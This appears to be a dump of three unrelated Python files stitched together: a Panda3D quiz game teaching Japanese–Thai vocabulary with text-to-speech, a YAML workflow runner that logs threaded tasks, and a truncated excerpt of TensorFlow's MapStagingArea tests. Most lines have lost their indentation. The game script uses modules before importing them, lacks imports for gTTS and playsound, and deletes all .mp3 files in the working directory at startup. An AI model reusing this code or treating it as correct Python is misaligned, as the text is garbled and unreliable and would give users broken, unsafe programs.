randomnum = list(range(65,90))
deletemp3 = True
allfolder = os.listdir()
if deletemp3:
for f in allfolder:
if f[-3:] == 'mp3':
os.remove(f)
def generatename():
nm = ''
for i in range(15):
rd = chr(random.choice(randomnum))
nm += rd
nm += '.mp3'
return nm
#allfilename = []
#-------------------------
import threading
from direct.showbase.ShowBase import ShowBase
from panda3d.core import CollisionTraverser, CollisionNode
from panda3d.core import CollisionHandlerQueue, CollisionRay
from panda3d.core import Filename, AmbientLight, DirectionalLight
from panda3d.core import PandaNode, NodePath, Camera, TextNode
from panda3d.core import CollideMask
from direct.gui.OnscreenText import OnscreenText
from direct.actor.Actor import Actor
import random
import sys
import os
import math
import time
# Function to put instructions on the screen.
def addInstructions(pos, msg):
return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1), scale=.10,
shadow=(0, 0, 0, 1), parent=base.a2dTopLeft,
pos=(0.08, -pos - 0.04), align=TextNode.ALeft,font = loader.loadFont("japanese.ttf"))
def addInstructions2(pos, msg):
return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1), scale=.10,
shadow=(0, 0, 0, 1), parent=base.a2dTopLeft,
pos=(0.08, -pos - 0.04), align=TextNode.ALeft,font = loader.loadFont("THSarabunNew.ttf"))
def addInstructions3(pos, msg):
return OnscreenText(text=msg, style=1, fg=(1, 1, 1, 1), scale=.10,
shadow=(0, 0, 0, 1), parent=base.a2dBottomRight,
pos=(-0.1, 1.8), align=TextNode.ARight,font = loader.loadFont("THSarabunNew.ttf"))
# Function to put title on the screen.
def addTitle(text):
return OnscreenText(text=text, style=1, fg=(1, 1, 1, 1), scale=.10,
parent=base.a2dBottomRight, align=TextNode.ARight,
pos=(-0.1, 0.09), shadow=(0, 0, 0, 1),font = loader.loadFont("THSarabunNew.ttf"),)
class Allbox:
def __init__(self):
self.box = Actor("models/Box")
self.box.reparentTo(render)
self.box.setScale(.2)
self.box.setPos(-102,0.3,-0.5)
class RoamingRalphDemo(ShowBase):
def __init__(self):
# Set up the window, camera, etc.
ShowBase.__init__(self)
self.question = {1:{'qa':'猫はタイ語で何ですか?',
'ans':3,
'a1':'ไก่',
'a2':'หนู',
'a3':'แมว',
'a4':'ช้าง'},
2:{'qa':'あかはタイ語で何ですか?',
'ans':1,
'a1':'สีแดง',
'a2':'สีเหลือง',
'a3':'สีส้ม',
'a4':'สีดำ'}}
self.currentqa = 1
self.allfilename = []
# Set the background color to black
self.win.setClearColor((0, 0, 0, 1))
# This is used to store which keys are currently pressed.
self.keyMap = {
"left": 0, "right": 0, "forward": 0, "cam-left": 0, "cam-right": 0}
# Post the instructions
#self.font = loader.loadFont("tahoma.ttf")
self.title = addTitle("เกมฝึกภาษาญี่ปุ่น โดย ลุงวิศวกรจร้าา")
self.qa = addInstructions(0.10, " ")
self.a1 = addInstructions2(0.20, " ")
self.a2 = addInstructions2(0.30, " ")
self.a3 = addInstructions2(0.40, " ")
self.a4 = addInstructions2(0.50, " ")
# Set up the environment
#
# This environment model contains collision meshes. If you look
# in the egg file, you will see the following:
#
# <Collide> { Polyset keep descend }
#
# This tag causes the following mesh to be converted to a collision
# mesh -- a mesh which is optimized for collision, not rendering.
# It also keeps the original mesh, so there are now two copies ---
# one optimized for rendering, one for collisions.
self.environ = loader.loadModel("models/world")
self.environ.reparentTo(render)
# Create the main character, Ralph
ralphStartPos = self.environ.find("**/start_point").getPos()
self.ralph = Actor("models/ralph",
{"run": "models/ralph-run",
"walk": "models/ralph-walk"})
self.ralph.reparentTo(render)
self.ralph.setScale(.2)
self.ralph.setPos(ralphStartPos + (0, 0, 0.5))
#for i in range(5):
'''
self.box = Actor("models/Box")
self.box.reparentTo(render)
self.box.setScale(.2)
self.box.setPos(-102,0.3,-0.5)
'''
model = Allbox()
self.box = model.box
# Create a floater object, which floats 2 units above ralph. We
# use this as a target for the camera to look at.
self.floater = NodePath(PandaNode("floater"))
self.floater.reparentTo(self.ralph)
self.floater.setZ(1.0)
# Accept the control keys for movement and rotation
self.accept("escape", sys.exit)
self.accept("a", self.setKey, ["left", True])
self.accept("d", self.setKey, ["right", True])
self.accept("w", self.setKey, ["forward", True])
#self.accept("a", self.setKey, ["cam-left", True])
#self.accept("s", self.setKey, ["cam-right", True])
self.accept("a-up", self.setKey, ["left", False])
self.accept("d-up", self.setKey, ["right", False])
self.accept("w-up", self.setKey, ["forward", False])
#self.accept("a-up", self.setKey, ["cam-left", False])
#self.accept("s-up", self.setKey, ["cam-right", False])
self.accept('z', self.openBox)
self.ans = 1
self.accept('1', self.CheckResult,[1])
self.accept('2', self.CheckResult,[2])
self.accept('3', self.CheckResult,[3])
self.accept('4', self.CheckResult,[4])
taskMgr.add(self.move, "moveTask")
# Game state variables
self.isMoving = False
# Set up the camera
self.disableMouse()
self.camera.setPos(self.ralph.getX(), self.ralph.getY() + 10, 2)
# We will detect the height of the terrain by creating a collision
# ray and casting it downward toward the terrain. One ray will
# start above ralph's head, and the other will start above the camera.
# A ray may hit the terrain, or it may hit a rock or a tree. If it
# hits the terrain, we can detect the height. If it hits anything
# else, we rule that the move is illegal.
self.cTrav = CollisionTraverser()
self.ralphGroundRay = CollisionRay()
self.ralphGroundRay.setOrigin(0, 0, 9)
self.ralphGroundRay.setDirection(0, 0, -1)
self.ralphGroundCol = CollisionNode('ralphRay')
self.ralphGroundCol.addSolid(self.ralphGroundRay)
self.ralphGroundCol.setFromCollideMask(CollideMask.bit(0))
self.ralphGroundCol.setIntoCollideMask(CollideMask.allOff())
self.ralphGroundColNp = self.ralph.attachNewNode(self.ralphGroundCol)
self.ralphGroundHandler = CollisionHandlerQueue()
self.cTrav.addCollider(self.ralphGroundColNp, self.ralphGroundHandler)
self.camGroundRay = CollisionRay()
self.camGroundRay.setOrigin(0, 0, 9)
self.camGroundRay.setDirection(0, 0, -1)
self.camGroundCol = CollisionNode('camRay')
self.camGroundCol.addSolid(self.camGroundRay)
self.camGroundCol.setFromCollideMask(CollideMask.bit(0))
self.camGroundCol.setIntoCollideMask(CollideMask.allOff())
self.camGroundColNp = self.camera.attachNewNode(self.camGroundCol)
self.camGroundHandler = CollisionHandlerQueue()
self.cTrav.addCollider(self.camGroundColNp, self.camGroundHandler)
# Uncomment this line to see the collision rays
#self.ralphGroundColNp.show()
#self.camGroundColNp.show()
# Uncomment this line to show a visual representation of the
        # collisions occurring
#self.cTrav.showCollisions(render)
# Create some lighting
ambientLight = AmbientLight("ambientLight")
ambientLight.setColor((.3, .3, .3, 1))
directionalLight = DirectionalLight("directionalLight")
directionalLight.setDirection((-5, -5, -5))
directionalLight.setColor((1, 1, 1, 1))
directionalLight.setSpecularColor((1, 1, 1, 1))
render.setLight(render.attachNewNode(ambientLight))
render.setLight(render.attachNewNode(directionalLight))
#Add Sound
self.box_sound = loader.loadSfx("box.ogg")
# Score
self.score = 0
self.a5 = addInstructions3(0.3, "Score: {}".format(self.score))
self.playagain = True
    def speak(self, word):
        tts = gTTS(text=word, lang='ja')
        name = generatename()  # generatename() already appends the '.mp3' extension
        tts.save(name)
        playsound(name)
# Records the state of the arrow keys
def CheckResult(self,number):
self.playsound = True
current = self.question[self.currentqa]
if number == self.question[self.currentqa]['ans']:
self.score += 1
self.a5.setText("Score: {}".format(self.score))
selectqa = self.question[self.currentqa]
if number == 1:
self.a1.setText('[1] '+ selectqa['a1'] + ' O')
self.a2.setText('[2] '+ selectqa['a2'])
self.a3.setText('[3] '+ selectqa['a3'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 2:
self.a2.setText('[2] '+ selectqa['a2'] + ' O')
self.a1.setText('[1] '+ selectqa['a1'])
self.a3.setText('[3] '+ selectqa['a3'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 3:
self.a3.setText('[3] '+ selectqa['a3'] + ' O')
self.a1.setText('[1] '+ selectqa['a1'])
self.a2.setText('[2] '+ selectqa['a2'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 4:
self.a4.setText('[4] '+ selectqa['a4'] + ' O')
self.a3.setText('[3] '+ selectqa['a3'])
self.a2.setText('[2] '+ selectqa['a2'])
self.a1.setText('[1] '+ selectqa['a1'])
else:
pass
task1 = threading.Thread(target=self.speak,args=('はい、そうです。',))
task1.start()
self.closeBox()
#self.speak('はい、そうです。')
else:
selectqa = self.question[self.currentqa]
if number == 1:
self.a1.setText('[1] '+ selectqa['a1'] + ' x')
self.a2.setText('[2] '+ selectqa['a2'])
self.a3.setText('[3] '+ selectqa['a3'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 2:
self.a2.setText('[2] '+ selectqa['a2'] + ' x')
self.a1.setText('[1] '+ selectqa['a1'])
self.a3.setText('[3] '+ selectqa['a3'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 3:
self.a3.setText('[3] '+ selectqa['a3'] + ' x')
self.a1.setText('[1] '+ selectqa['a1'])
self.a2.setText('[2] '+ selectqa['a2'])
self.a4.setText('[4] '+ selectqa['a4'])
elif number == 4:
self.a4.setText('[4] '+ selectqa['a4'] + ' x')
self.a3.setText('[3] '+ selectqa['a3'])
self.a2.setText('[2] '+ selectqa['a2'])
self.a1.setText('[1] '+ selectqa['a1'])
else:
pass
task1 = threading.Thread(target=self.speak,args=('じゃないです。',))
task1.start()
self.closeBox()
def setKey(self, key, value):
self.keyMap[key] = value
def openBox(self):
print('CURRENT: ',self.allfilename)
pry = self.ralph.getY()
pby = self.box.getY()
prx = self.ralph.getX()
pbx = self.box.getX()
check1 = prx < pbx + 1.5 and prx > pbx -1.5
check2 = pry < pby + 1.5 and pry > pby -1.5
print(prx-pbx,':',pry-pby)
print(check1, check2)
startpos = self.ralph.getPos()
print(startpos,'BY', self.box.getY(),'BX', self.box.getX())
def Play():
            tts = gTTS(text=selectqa['qa'], lang='ja')
            name = generatename()  # generatename() already appends the '.mp3' extension
            tts.save(name)
            playsound(name)
if check1 and check2:
rdnum = list(range(1,3))
number = random.choice(rdnum)
selectqa = self.question[number]
self.currentqa = number
self.qa.setText('Question: '+ selectqa['qa'])
self.a1.setText('[1] '+ selectqa['a1'])
self.a2.setText('[2] '+ selectqa['a2'])
self.a3.setText('[3] '+ selectqa['a3'])
self.a4.setText('[4] '+ selectqa['a4'])
self.box.play('openBox')
self.box_sound.play()
task1 = threading.Thread(target=Play)
task1.start()
# if self.playagain == True:
# name = generatename()
# self.allfilename.append(name)
# tts.save(name)
# self.playagain = False
# if len(self.allfilename) > 1:
# os.remove(self.allfilename[0])
# del self.allfilename[0]
# playsound(self.allfilename[0])
def closeBox(self):
self.box.play('closeBox')
# Accepts arrow keys to move either the player or the menu cursor,
# Also deals with grid checking and collision detection
def move(self, task):
# Get the time that elapsed since last frame. We multiply this with
# the desired speed in order to find out with which distance to move
# in order to achieve that desired speed.
dt = globalClock.getDt()
# If the camera-left key is pressed, move camera left.
# If the camera-right key is pressed, move camera right.
if self.keyMap["cam-left"]:
self.camera.setX(self.camera, -10 * dt)
if self.keyMap["cam-right"]:
self.camera.setX(self.camera, +10 * dt)
# if base.mouseWatcherNode.hasMouse():
# mpos = base.mouseWatcherNode.getMouse() # get the mouse position
# self.maze.setP(mpos.getY() * -10)
# self.maze.setR(mpos.getX() * 10)
if base.mouseWatcherNode.hasMouse():
mpos = base.mouseWatcherNode.getMouse()
if mpos.getX() < -0.2 or mpos.getX() > 0.2:
self.camera.setX(self.camera, mpos.getX() * -5 * dt)
print('Mouse: ' ,mpos.getX())
# save ralph's initial position so that we can restore it,
# in case he falls off the map or runs into something.
startpos = self.ralph.getPos()
#print(startpos,'BY', self.box.getY(),'BX', self.box.getX())
#self.title.setText('X: {:.3f} , Y: {:.3f}, Z: {:.3f}'.format(self.ralph.getX(),self.ralph.getY(),self.ralph.getZ()))
# If a move-key is pressed, move ralph in the specified direction.
if self.keyMap["left"]:
self.ralph.setH(self.ralph.getH() + 200 * dt)
if self.keyMap["right"]:
self.ralph.setH(self.ralph.getH() - 200 * dt)
if self.keyMap["forward"]:
self.ralph.setY(self.ralph, -25 * dt)
# If ralph is moving, loop the run animation.
# If he is standing still, stop the animation.
if self.keyMap["forward"] or self.keyMap["left"] or self.keyMap["right"]:
if self.isMoving is False:
self.ralph.loop("run")
self.isMoving = True
else:
if self.isMoving:
self.ralph.stop()
self.ralph.pose("walk", 5)
self.isMoving = False
# If the camera is too far from ralph, move it closer.
# If the camera is too close to ralph, move it farther.
camvec = self.ralph.getPos() - self.camera.getPos()
camvec.setZ(0)
camdist = camvec.length()
camvec.normalize()
if camdist > 10.0:
self.camera.setPos(self.camera.getPos() + camvec * (camdist - 10))
camdist = 10.0
if camdist < 5.0:
self.camera.setPos(self.camera.getPos() - camvec * (5 - camdist))
camdist = 5.0
# Normally, we would have to call traverse() to check for collisions.
# However, the class ShowBase that we inherit from has a task to do
# this for us, if we assign a CollisionTraverser to self.cTrav.
#self.cTrav.traverse(render)
# Adjust ralph's Z coordinate. If ralph's ray hit terrain,
# update his Z. If it hit anything else, or didn't hit anything, put
# him back where he was last frame.
entries = list(self.ralphGroundHandler.getEntries())
entries.sort(key=lambda x: x.getSurfacePoint(render).getZ())
if len(entries) > 0 and entries[0].getIntoNode().getName() == "terrain":
self.ralph.setZ(entries[0].getSurfacePoint(render).getZ())
else:
self.ralph.setPos(startpos)
# Keep the camera at one foot above the terrain,
# or two feet above ralph, whichever is greater.
entries = list(self.camGroundHandler.getEntries())
entries.sort(key=lambda x: x.getSurfacePoint(render).getZ())
if len(entries) > 0 and entries[0].getIntoNode().getName() == "terrain":
self.camera.setZ(entries[0].getSurfacePoint(render).getZ() + 1.0)
if self.camera.getZ() < self.ralph.getZ() + 2.0:
self.camera.setZ(self.ralph.getZ() + 2.0)
# The camera should look in ralph's direction,
# but it should also try to stay horizontal, so look at
# a floater which hovers above ralph's head.
self.camera.lookAt(self.floater)
return task.cont
demo = RoamingRalphDemo()
demo.run()
|
Milestone1.py
|
import threading
import datetime
import time
import yaml
with open('Milestone1B.yaml', 'r') as file:
data = yaml.safe_load(file)
output = open("Milestone1B.txt", "w")
def TimeFunction(ExecutionTime):
time.sleep(ExecutionTime)
def execWorkFlow(item, parent, log):
    time = datetime.datetime.now()
    name = item[0]
    fullName = ""
    if parent == "":
        fullName = name
    else:
        fullName = parent+"."+name
    log.write(str(time)+";"+fullName+" Entry\n")
    content = item[1]
if(content['Type'] == 'Flow'):
if(content['Execution'] == 'Sequential'):
for act in content['Activities'].items():
execWorkFlow(act, fullName, log)
else:
size = len(content['Activities'])
threads = []
for act in content['Activities'].items():
temp_thread = threading.Thread(target=execWorkFlow, args=(act, fullName, log,))
temp_thread.start()
threads.append(temp_thread)
for t in threads:
t.join()
else:
function = content['Function']
time = datetime.datetime.now()
if(function == 'TimeFunction'):
execTime = content['Inputs']['ExecutionTime']
execTime = int(execTime)
TimeFunction(execTime)
log.write(str(time)+";"+fullName+" Executing "+function+"(")
flag = False
for input in content['Inputs']:
if(flag):
log.write(",")
log.write(content['Inputs'][input])
flag = True
log.write(")\n")
else:
log.write(str(time)+";"+fullName+" Executing "+function+"()\n")
time = datetime.datetime.now()
log.write(str(time)+";"+fullName+" Exit\n")
for work in data.items():
execWorkFlow(work, "", output)
output.close()
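# Illustrative sketch of the YAML structure this script assumes; the field names
# ('Type', 'Execution', 'Activities', 'Function', 'Inputs', 'ExecutionTime') come from the
# reads above, while the concrete activity names and values are hypothetical:
#
# WorkFlow:
#   Type: Flow
#   Execution: Sequential
#   Activities:
#     Task1:
#       Type: Task
#       Function: TimeFunction
#       Inputs:
#         ExecutionTime: '2'
#     SubFlow:
#       Type: Flow
#       Execution: Concurrent
#       Activities:
#         Task2: {Type: Task, Function: TimeFunction, Inputs: {ExecutionTime: '1'}}
#         Task3: {Type: Task, Function: TimeFunction, Inputs: {ExecutionTime: '1'}}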
|
map_stage_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
TIMEOUT = 1
class MapStageTest(test.TestCase):
@test_util.run_deprecated_v1
def testSimple(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([dtypes.float32])
stage = stager.put(pi, [v], [0])
k, y = stager.get(gi)
y = math_ops.reduce_max(math_ops.matmul(y, y))
g.finalize()
with self.session(graph=g) as sess:
sess.run(stage, feed_dict={x: -1, pi: 0})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i, pi: i + 1, gi: i})
self.assertAllClose(4 * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
@test_util.run_deprecated_v1
def testMultiple(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([dtypes.float32, dtypes.float32])
stage = stager.put(pi, [x, v], [0, 1])
k, (z, y) = stager.get(gi)
y = math_ops.reduce_max(z * math_ops.matmul(y, y))
g.finalize()
with self.session(graph=g) as sess:
sess.run(stage, feed_dict={x: -1, pi: 0})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i, pi: i + 1, gi: i})
self.assertAllClose(
4 * (i - 1) * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
@test_util.run_deprecated_v1
def testDictionary(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([dtypes.float32, dtypes.float32],
shapes=[[], [128, 128]],
names=['x', 'v'])
stage = stager.put(pi, {'x': x, 'v': v})
key, ret = stager.get(gi)
z = ret['x']
y = ret['v']
y = math_ops.reduce_max(z * math_ops.matmul(y, y))
g.finalize()
with self.session(graph=g) as sess:
sess.run(stage, feed_dict={x: -1, pi: 0})
for i in range(10):
_, yval = sess.run([stage, y], feed_dict={x: i, pi: i + 1, gi: i})
self.assertAllClose(
4 * (i - 1) * (i - 1) * (i - 1) * 128, yval, rtol=1e-4)
def testColocation(self):
gpu_dev = test.gpu_device_name()
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(gpu_dev):
stager = data_flow_ops.MapStagingArea([dtypes.float32])
y = stager.put(1, [v], [0])
expected_name = gpu_dev if 'gpu' not in gpu_dev else '/device:GPU:0'
self.assertEqual(y.device, expected_name)
with ops.device('/cpu:0'):
_, x = stager.get(1)
y = stager.peek(1)[0]
_, z = stager.get()
self.assertEqual(x[0].device, '/device:CPU:0')
self.assertEqual(y.device, '/device:CPU:0')
self.assertEqual(z[0].device, '/device:CPU:0')
g.finalize()
@test_util.run_deprecated_v1
def testPeek(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.int32, name='x')
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
p = array_ops.placeholder(dtypes.int32, name='p')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([
dtypes.int32,
], shapes=[[]])
stage = stager.put(pi, [x], [0])
peek = stager.peek(gi)
size = stager.size()
g.finalize()
n = 10
with self.session(graph=g) as sess:
for i in range(n):
sess.run(stage, feed_dict={x: i, pi: i})
for i in range(n):
self.assertEqual(sess.run(peek, feed_dict={gi: i})[0], i)
self.assertEqual(sess.run(size), 10)
@test_util.run_deprecated_v1
def testSizeAndClear(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32, name='x')
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
v = 2. * (array_ops.zeros([128, 128]) + x)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([dtypes.float32, dtypes.float32],
shapes=[[], [128, 128]],
names=['x', 'v'])
stage = stager.put(pi, {'x': x, 'v': v})
size = stager.size()
clear = stager.clear()
g.finalize()
with self.session(graph=g) as sess:
sess.run(stage, feed_dict={x: -1, pi: 3})
self.assertEqual(sess.run(size), 1)
sess.run(stage, feed_dict={x: -1, pi: 1})
self.assertEqual(sess.run(size), 2)
sess.run(clear)
self.assertEqual(sess.run(size), 0)
@test_util.run_deprecated_v1
def testCapacity(self):
capacity = 3
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.int32, name='x')
pi = array_ops.placeholder(dtypes.int64, name='pi')
gi = array_ops.placeholder(dtypes.int64, name='gi')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([
dtypes.int32,
],
capacity=capacity,
shapes=[[]])
stage = stager.put(pi, [x], [0])
get = stager.get()
size = stager.size()
g.finalize()
from six.moves import queue as Queue
import threading
queue = Queue.Queue()
n = 8
with self.session(graph=g) as sess:
# Stage data in a separate thread which will block
# when it hits the staging area's capacity and thus
# not fill the queue with n tokens
def thread_run():
for i in range(n):
sess.run(stage, feed_dict={x: i, pi: i})
queue.put(0)
t = threading.Thread(target=thread_run)
t.daemon = True
t.start()
# Get tokens from the queue until a timeout occurs
try:
for i in range(n):
queue.get(timeout=TIMEOUT)
except Queue.Empty:
pass
# Should've timed out on the iteration 'capacity'
if not i == capacity:
self.fail("Expected to timeout on iteration '{}' "
"but instead timed out on iteration '{}' "
"Staging Area size is '{}' and configured "
"capacity is '{}'.".format(capacity, i, sess.run(size),
capacity))
# Should have capacity elements in the staging area
self.assertEqual(sess.run(size), capacity)
# Clear the staging area completely
for i in range(n):
sess.run(get)
self.assertEqual(sess.run(size), 0)
@test_util.run_deprecated_v1
def testMemoryLimit(self):
memory_limit = 512 * 1024 # 512K
    chunk = 200 * 1024  # 200K
capacity = memory_limit // chunk
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.uint8, name='x')
pi = array_ops.placeholder(dtypes.int64, name='pi')
gi = array_ops.placeholder(dtypes.int64, name='gi')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([dtypes.uint8],
memory_limit=memory_limit,
shapes=[[]])
stage = stager.put(pi, [x], [0])
get = stager.get()
size = stager.size()
g.finalize()
from six.moves import queue as Queue
import threading
queue = Queue.Queue()
n = 8
with self.session(graph=g) as sess:
# Stage data in a separate thread which will block
# when it hits the staging area's capacity and thus
# not fill the queue with n tokens
def thread_run():
for i in range(n):
data = np.full(chunk, i, dtype=np.uint8)
sess.run(stage, feed_dict={x: data, pi: i})
queue.put(0)
t = threading.Thread(target=thread_run)
t.daemon = True
t.start()
# Get tokens from the queue until a timeout occurs
try:
for i in range(n):
queue.get(timeout=TIMEOUT)
except Queue.Empty:
pass
# Should've timed out on the iteration 'capacity'
if not i == capacity:
self.fail("Expected to timeout on iteration '{}' "
"but instead timed out on iteration '{}' "
"Staging Area size is '{}' and configured "
"capacity is '{}'.".format(capacity, i, sess.run(size),
capacity))
# Should have capacity elements in the staging area
self.assertEqual(sess.run(size), capacity)
# Clear the staging area completely
for i in range(n):
sess.run(get)
self.assertEqual(sess.run(size), 0)
@test_util.run_deprecated_v1
def testOrdering(self):
import six
import random
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.int32, name='x')
pi = array_ops.placeholder(dtypes.int64, name='pi')
gi = array_ops.placeholder(dtypes.int64, name='gi')
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea([
dtypes.int32,
],
shapes=[[]],
ordered=True)
stage = stager.put(pi, [x], [0])
get = stager.get()
size = stager.size()
g.finalize()
n = 10
with self.session(graph=g) as sess:
# Keys n-1..0
keys = list(reversed(six.moves.range(n)))
for i in keys:
sess.run(stage, feed_dict={pi: i, x: i})
self.assertEqual(sess.run(size), n)
# Check that key, values come out in ascending order
for i, k in enumerate(reversed(keys)):
get_key, values = sess.run(get)
self.assertTrue(i == k == get_key == values)
self.assertEqual(sess.run(size), 0)
@test_util.run_deprecated_v1
def testPartialDictInsert(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
f = array_ops.placeholder(dtypes.float32)
v = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
with ops.device(test.gpu_device_name()):
# Test barrier with dictionary
stager = data_flow_ops.MapStagingArea(
[dtypes.float32, dtypes.float32, dtypes.float32],
names=['x', 'v', 'f'])
stage_xf = stager.put(pi, {'x': x, 'f': f})
stage_v = stager.put(pi, {'v': v})
key, ret = stager.get(gi)
size = stager.size()
isize = stager.incomplete_size()
g.finalize()
with self.session(graph=g) as sess:
# 0 complete and incomplete entries
self.assertEqual(sess.run([size, isize]), [0, 0])
# Stage key 0, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 0, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 1])
# Stage key 1, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 1, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 2])
# Now complete key 0 with tuple entry v
sess.run(stage_v, feed_dict={pi: 0, v: 1})
# 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 1])
# We can now obtain tuple associated with key 0
self.assertEqual(
sess.run([key, ret], feed_dict={gi: 0}),
[0, {
'x': 1,
'f': 2,
'v': 1
}])
# 0 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [0, 1])
# Now complete key 1 with tuple entry v
sess.run(stage_v, feed_dict={pi: 1, v: 3})
# We can now obtain tuple associated with key 1
self.assertEqual(
sess.run([key, ret], feed_dict={gi: 1}),
[1, {
'x': 1,
'f': 2,
'v': 3
}])
@test_util.run_deprecated_v1
def testPartialIndexInsert(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
f = array_ops.placeholder(dtypes.float32)
v = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
with ops.device(test.gpu_device_name()):
stager = data_flow_ops.MapStagingArea(
[dtypes.float32, dtypes.float32, dtypes.float32])
stage_xf = stager.put(pi, [x, f], [0, 2])
stage_v = stager.put(pi, [v], [1])
key, ret = stager.get(gi)
size = stager.size()
isize = stager.incomplete_size()
g.finalize()
with self.session(graph=g) as sess:
# 0 complete and incomplete entries
self.assertEqual(sess.run([size, isize]), [0, 0])
# Stage key 0, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 0, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 1])
# Stage key 1, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 1, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 2])
# Now complete key 0 with tuple entry v
sess.run(stage_v, feed_dict={pi: 0, v: 1})
# 1 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [1, 1])
# We can now obtain tuple associated with key 0
self.assertEqual(sess.run([key, ret], feed_dict={gi: 0}), [0, [1, 1, 2]])
# 0 complete and 1 incomplete entry
self.assertEqual(sess.run([size, isize]), [0, 1])
# Now complete key 1 with tuple entry v
sess.run(stage_v, feed_dict={pi: 1, v: 3})
# We can now obtain tuple associated with key 1
self.assertEqual(sess.run([key, ret], feed_dict={gi: 1}), [1, [1, 3, 2]])
@test_util.run_deprecated_v1
def testPartialDictGetsAndPeeks(self):
with ops.Graph().as_default() as g:
with ops.device('/cpu:0'):
x = array_ops.placeholder(dtypes.float32)
f = array_ops.placeholder(dtypes.float32)
v = array_ops.placeholder(dtypes.float32)
pi = array_ops.placeholder(dtypes.int64)
pei = array_ops.placeholder(dtypes.int64)
gi = array_ops.placeholder(dtypes.int64)
with ops.device(test.gpu_device_name()):
# Test barrier with dictionary
stager = data_flow_ops.MapStagingArea(
[dtypes.float32, dtypes.float32, dtypes.float32],
names=['x', 'v', 'f'])
stage_xf = stager.put(pi, {'x': x, 'f': f})
stage_v = stager.put(pi, {'v': v})
peek_xf = stager.peek(pei, ['x', 'f'])
peek_v = stager.peek(pei, ['v'])
key_xf, get_xf = stager.get(gi, ['x', 'f'])
key_v, get_v = stager.get(gi, ['v'])
pop_key_xf, pop_xf = stager.get(indices=['x', 'f'])
pop_key_v, pop_v = stager.get(pi, ['v'])
size = stager.size()
isize = stager.incomplete_size()
g.finalize()
with self.session(graph=g) as sess:
# 0 complete and incomplete entries
self.assertEqual(sess.run([size, isize]), [0, 0])
# Stage key 0, x and f tuple entries
sess.run(stage_xf, feed_dict={pi: 0, x: 1, f: 2})
self.assertEqual(sess.run([size, isize]), [0, 1])
